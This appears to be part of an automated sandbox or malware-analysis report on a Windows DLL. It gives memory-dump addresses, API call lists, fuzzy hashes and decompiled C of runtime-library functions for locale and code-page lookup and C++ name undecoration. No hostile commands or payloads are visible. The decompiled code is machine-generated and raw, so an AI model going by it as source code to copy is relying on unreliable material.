0x6e1df028
0x00000000
0x6e1df02e
0x6e1df030
0x6e1df030
0x6e1df03c
0x6e1df04a
0x00000000
0x6e1df04c
0x6e1df04c
0x6e1df04f
0x6e1df055
0x6e1df058
0x6e1df068
0x6e1df06d
0x6e1df07b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1df05a
0x6e1df05a
0x6e1df05d
0x6e1df063
0x6e1df066
0x6e1df07d
0x6e1df07d
0x6e1df089
0x6e1df0a9
0x00000000
0x6e1df08b
0x6e1df08b
0x6e1df095
0x6e1df09a
0x6e1df09f
0x00000000
0x6e1df0a1
0x00000000
0x6e1df0a1
0x6e1df09f
0x00000000
0x00000000
0x00000000
0x6e1df066
0x6e1df058
0x6e1df04a
0x6e1df028
0x6e1df012
0x6e1defd7
0x6e1defa5

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

GetACP.KERNEL32(?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6E1DEF90
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?), ref: 6E1DEFBB
_wcschr.LIBVCRUNTIME ref: 6E1DF04F
_wcschr.LIBVCRUNTIME ref: 6E1DF05D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E1DF11E

Strings

utf8, xrefs: 6E1DF08D

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: d42e11387394c4ca089d28538f69e827f82be10d63587a9a9a9708dab06e7b08
Instruction ID: fcc2f03058cd77943056eb03dccd44505359c51f4753464fde7a78b7267f4403
Opcode Fuzzy Hash: d42e11387394c4ca089d28538f69e827f82be10d63587a9a9a9708dab06e7b08
Instruction Fuzzy Hash: 3F711A32A10206AAE714DFF5CC45AEBB3BCEF58705F204469E525D7180EB71EAC8E761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF679, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E1DF679(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E1CEF7B(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6e1df67e
0x6e1df67f
0x6e1df686
0x6e1df72a
0x6e1df743
0x6e1df749
0x6e1df74e
0x6e1df750
0x6e1df750
0x6e1df756
0x6e1df759
0x6e1df759
0x6e1df745
0x6e1df745
0x00000000
0x6e1df745
0x6e1df68c
0x6e1df691
0x00000000
0x00000000
0x6e1df697
0x6e1df69c
0x6e1df69e
0x6e1df69e
0x6e1df6a4
0x00000000
0x00000000
0x6e1df6a9
0x6e1df6c0
0x6e1df6c0
0x6e1df6c9
0x6e1df6cb
0x00000000
0x00000000
0x6e1df6cd
0x6e1df6d2
0x6e1df6d4
0x6e1df6d4
0x6e1df6da
0x00000000
0x00000000
0x6e1df6df
0x6e1df6fd
0x6e1df6ff
0x6e1df722
0x00000000
0x6e1df727
0x6e1df71a
0x00000000
0x00000000
0x6e1df71c
0x00000000
0x6e1df71c
0x6e1df6e1
0x6e1df6e9
0x00000000
0x00000000
0x6e1df6eb
0x6e1df6ee
0x6e1df6f4
0x00000000
0x00000000
0x00000000
0x6e1df6f6
0x6e1df6f8
0x6e1df6fa
0x00000000
0x6e1df6fa
0x6e1df6ab
0x6e1df6b3
0x00000000
0x00000000
0x6e1df6b5
0x6e1df6b8
0x6e1df6be
0x00000000
0x00000000
0x00000000
0x6e1df6be
0x6e1df6c4
0x6e1df6c6
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF712
GetLocaleInfoW.KERNEL32(?,20001004,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF73B
GetACP.KERNEL32(?,?,6E1DF997,?,00000000), ref: 6E1DF750

Strings

OCP, xrefs: 6E1DF6CD
ACP, xrefs: 6E1DF697

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction ID: cce3889d74054d3dde4e500e9e911cf9744d65b122a1351814f7a9dfa2310df5
Opcode Fuzzy Hash: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction Fuzzy Hash: 7D21C432A54101AAE7608FE5C944AC773B6EF68B60B728414E935D7218E732DFC5E350

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF84E, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1DF84E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t127 = __fp0;
				_t39 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E6E1CF749(__ecx, __edx, __fp0) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E1CF749(__ecx, __edx, __fp0);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0x6e1f660c; // 0x17
					E6E1DF7ED(_t91, 0, 0x6e1f64f8, _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E6E1DF171(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E6E1DF275(_t91, _t99, __eflags, _t127,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E6E1DF679(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
							if(_t108 == 0) {
								L22:
								L23:
								return E6E1A93EA(_v8 ^ _t109);
							}
							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t108;
							}
							E6E1D48A9(_v16,  &(_v24[0x94]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xd0
							E6E1D48A9(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0x30
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb0
							E6E1E60C1(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0x6e1f64f4; // 0x41
						_t76 = E6E1DF7ED(_t91, _t99, 0x6e1f61e8, _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E6E1DF275(_t91, _t99, __eflags, _t127,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t123 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E6E1DF1DA(_t91, _t99, _t123, _t127,  &_v20);
						goto L15;
					}
					_t119 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E6E1DF1DA(_t91, _t99, _t119, _t127,  &_v20);
					goto L9;
				}
			}

0x6e1df84e
0x6e1df856
0x6e1df85d
0x6e1df864
0x6e1df868
0x6e1df86c
0x6e1df87a
0x6e1df87f
0x6e1df880
0x6e1df881
0x6e1df882
0x6e1df88a
0x6e1df88c
0x6e1df892
0x6e1df898
0x6e1df89b
0x6e1df89d
0x6e1df8a0
0x6e1df8a4
0x6e1df8ab
0x6e1df8b8
0x6e1df8bd
0x6e1df8c0
0x6e1df8c3
0x6e1df8c3
0x6e1df8c5
0x6e1df8c8
0x6e1df8cc
0x6e1df93c
0x6e1df93e
0x6e1df940
0x6e1df953
0x6e1df953
0x6e1df95a
0x6e1df960
0x6e1df963
0x00000000
0x6e1df963
0x6e1df942
0x6e1df945
0x00000000
0x00000000
0x6e1df94b
0x6e1df950
0x00000000
0x6e1df8d3
0x6e1df8d3
0x6e1df8d7
0x6e1df8e9
0x6e1df8ed
0x6e1df8f2
0x6e1df8f6
0x6e1df8f7
0x6e1df97f
0x6e1df97f
0x6e1df981
0x6e1df98d
0x6e1df997
0x6e1df99b
0x6e1df99d
0x6e1df96e
0x6e1df970
0x6e1df97e
0x6e1df97e
0x6e1df9a3
0x6e1df9a9
0x6e1df9ab
0x00000000
0x00000000
0x6e1df9b2
0x6e1df9b8
0x6e1df9ba
0x00000000
0x00000000
0x6e1df9bc
0x6e1df9bf
0x6e1df9c1
0x6e1df9c3
0x6e1df9c3
0x6e1df9d4
0x6e1df9d9
0x6e1df9db
0x6e1dfa3b
0x00000000
0x6e1dfa3d
0x6e1df9e0
0x6e1df9ea
0x6e1df9fa
0x6e1dfa00
0x6e1dfa02
0x00000000
0x00000000
0x6e1dfa0a
0x6e1dfa19
0x6e1dfa1f
0x6e1dfa21
0x00000000
0x00000000
0x6e1dfa2b
0x6e1dfa33
0x00000000
0x6e1dfa38
0x6e1df8fd
0x6e1df90c
0x6e1df911
0x6e1df916
0x6e1df966
0x6e1df966
0x6e1df966
0x6e1df968
0x6e1df96c
0x00000000
0x00000000
0x00000000
0x6e1df96c
0x6e1df918
0x6e1df91a
0x6e1df91e
0x6e1df930
0x6e1df934
0x6e1df939
0x6e1df939
0x00000000
0x6e1df939
0x6e1df920
0x6e1df923
0x00000000
0x00000000
0x6e1df929
0x00000000
0x6e1df929
0x6e1df8d9
0x6e1df8dc
0x00000000
0x00000000
0x6e1df8e2
0x00000000
0x6e1df8e2

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7AB
Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E1DF95A
IsValidCodePage.KERNEL32(00000000), ref: 6E1DF9A3
IsValidLocale.KERNEL32(?,00000001), ref: 6E1DF9B2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E1DF9FA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E1DFA19

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: c57a5f182c15b846d3121425ad0acb95a4e824e400706b94ca306f20c76a80ed
Instruction ID: 8909db9d014c77ecd0a065871c5c95f97eba3c3e4ab4e7b99410db9c056447bc
Opcode Fuzzy Hash: c57a5f182c15b846d3121425ad0acb95a4e824e400706b94ca306f20c76a80ed
Instruction Fuzzy Hash: 85515E71D0060AAAEF44DFE5CC44AAE77B9AF19704F204429A921EB150E7709A89EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2A33, Relevance: 28.8, APIs: 19, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1B2A33(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				signed int _t181;
				signed int _t185;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x6e221b68; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E6E1AFB49(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x6e221b68 = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x6e221b70; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E6E1AFE15( &_v12, E6E1B116E(_t253, __eflags));
								} else {
									_t162 = E6E1AFB1E(_t198,  &_v44, 0x20, E6E1B116E(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E6E1AFB8D(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x6e221b70; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E6E1B180D();
								_t200 =  &_v12;
								E6E1AFE15( &_v12, _t115);
							} else {
								_t152 = E6E1AFB8D(E6E1B180D(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E6E1AFB1E(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E6E1AFBAF(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E6E1B2E9E(0x6e221b84, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E6E1B3CCB(0,  &_v36, _t261);
							E6E1AFC87( &_v12, E6E1AFBAF(E6E1AFB1E(0x6e221b84,  &_v44, 0x28, E6E1B0E16( &_v52)),  &_v28, 0x29));
							_t205 =  *0x6e221b70; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E6E1AFC87( &_v12,  &_v20);
								_t205 =  *0x6e221b70; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E6E1B3BA2(_t253);
								_t209 =  &_v12;
								E6E1AFE15( &_v12, _t129);
							} else {
								_t142 = E6E1B3BA2(_t253);
								_t209 =  &_v12;
								E6E1AFC87( &_v12, _t142);
							}
							E6E1AFC87( &_v12, E6E1B2F28(_t209,  &_v52));
							_t134 =  *0x6e221b70; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E6E1AFE15( &_v12, E6E1B4C32());
							} else {
								E6E1AFC87( &_v12, E6E1B4C32());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x6e221b68 = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E6E1AFB8D(E6E1AF804( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x6e221b68 = _t165 + 1;
							_t169 =  *0x6e221b70; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E6E1B4C03();
								_t198 =  &_v20;
								E6E1AFE15( &_v20, _t172);
							} else {
								_t174 = E6E1B4C03();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t244 = E6E1AF764( &_v44,  &_v28);
						E6E1AFB8D(_t177,  &_v28,  &_v12);
						_v12 = _v28;
						_v8 = _v24;
						_t181 =  *0x6e221b68; // 0x0
						if( *_t181 == 0) {
							E6E1AFB8D(E6E1AF804( &_v52, 1),  &_v28,  &_v12);
							_v12 = _v28;
							_t185 = _v24;
						} else {
							_t189 = E6E1AFB1E(_t244,  &_v28, 0x20, E6E1B3CFA(_t253,  &_v44));
							_t263 = _t263 + 0x10;
							_t190 = E6E1AFB8D(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x6e221b68; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x6e221b68 = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

APIs

DName::operator+.LIBCMT ref: 6E1B2B00
DName::operator+.LIBCMT ref: 6E1B2B3D
DName::DName.LIBVCRUNTIME ref: 6E1B2B51
DName::operator+.LIBCMT ref: 6E1B2B60
DName::operator+.LIBCMT ref: 6E1B2BEE
DName::operator|=.LIBCMT ref: 6E1B2C0A
DName::DName.LIBVCRUNTIME ref: 6E1B2C16
DName::operator+.LIBCMT ref: 6E1B2C24
DName::operator+.LIBCMT ref: 6E1B2C5E
DName::operator+.LIBCMT ref: 6E1B2C9F
UnDecorator::getReturnType.LIBCMT ref: 6E1B2CCF
operator+.LIBVCRUNTIME ref: 6E1B2DDC

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: 631fa3973187e4c018a5b2d70bd43f0aa4982f159f6872e294774a6f94f03667
Instruction ID: 9acdc76286cd79c533019e2fcbe40946821047d64789c5d4bcd3b201e29a2c6c
Opcode Fuzzy Hash: 631fa3973187e4c018a5b2d70bd43f0aa4982f159f6872e294774a6f94f03667
Instruction Fuzzy Hash: 60C1A475910209AFDF05CFE8C9A4EED7BF8BF19304F50446AE111A7280EB3199C9DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A72B0, Relevance: 28.8, APIs: 19, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1A72B0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				signed int _t65;
				signed char _t66;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t86;
				intOrPtr* _t88;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr* _t94;
				void* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				void* _t111;
				signed int _t117;
				void* _t118;
				void* _t147;
				signed int _t151;
				intOrPtr _t153;
				intOrPtr* _t154;
				void* _t155;
				void* _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr* _t164;
				void* _t165;
				void* _t166;
				void* _t174;
				void* _t175;
				void* _t176;

				_t154 = __esi;
				_t147 = __edx;
				E6E1A9DBF(0x6e1ed406, __ebx, __edi, __esi, 8);
				_push(0);
				_push(0);
				_t65 = E6E183233(__ebx, _t147, __edi, __esi);
				_t117 =  *(_t165 + 0x14);
				_t153 =  *((intOrPtr*)(_t165 + 0x10));
				_t151 = 1 << _t65 >> 1;
				if(( *(_t165 + 0xc) & 1) != 0) {
					_t110 = E6E161F29(_t117, 0x6e238be0, _t153, __esi);
					_t179 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t154 = _t110;
						_t111 = E6E182A2B(_t117, _t151, _t153, _t154, __eflags);
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t111);
						_t166 = _t166 + 0x10;
					} else {
						 *((intOrPtr*)(_t165 - 0x10)) = _t110;
						_t164 = E6E1A9621(_t117, _t153, __esi, _t179, 0x10);
						 *((intOrPtr*)(_t165 - 0x14)) = _t164;
						_t180 = _t164;
						if(_t164 == 0) {
							_t154 = 0;
							__eflags = 0;
						} else {
							 *(_t164 + 4) =  *(_t164 + 4) & _t117;
							 *_t164 = 0x6e1f253c;
							 *((intOrPtr*)(_t164 + 8)) = E6E192896(_t117, _t153, _t180);
							 *(_t164 + 0xc) = _t151;
						}
						_push( *((intOrPtr*)(_t165 - 0x10)));
						E6E1952CC(_t117, _t153, _t154, _t153, _t154);
						_t166 = _t166 + 0xc;
					}
				}
				_t66 =  *(_t165 + 0xc);
				if((_t66 & 0x00000020) != 0) {
					_t154 = E6E161F29(_t117, 0x6e221740, _t153, _t154);
					_t182 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t106 = E6E1A5A35(_t117, _t153, _t154, __eflags);
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t106);
						_t166 = _t166 + 0x10;
					} else {
						_t108 = E6E1A9621(_t117, _t153, _t154, _t182, 8);
						 *((intOrPtr*)(_t165 - 0x14)) = _t108;
						if(_t108 == 0) {
							_t108 = 0;
							__eflags = 0;
						} else {
							 *(_t108 + 4) =  *(_t108 + 4) & _t117;
							 *_t108 = 0x6e1f2558;
						}
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t108);
						_t166 = _t166 + 0xc;
					}
					_t66 =  *(_t165 + 0xc);
				}
				if((_t66 & 0x00000004) != 0) {
					_t158 = E6E161F29(_t117, 0x6e221744, _t153, _t154);
					_t185 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t80 = E6E1A5ACA(_t117, _t153, _t158, __eflags);
						_push(_t158);
						E6E1952CC(_t117, _t153, _t158, _t153, _t80);
						_t82 = E6E161F29(_t117, 0x6e221748, _t153, _t158);
						_push(_t117);
						_t159 = _t82;
						_t83 = E6E1A5B5F(_t117, _t153, _t159, __eflags);
						_push(_t159);
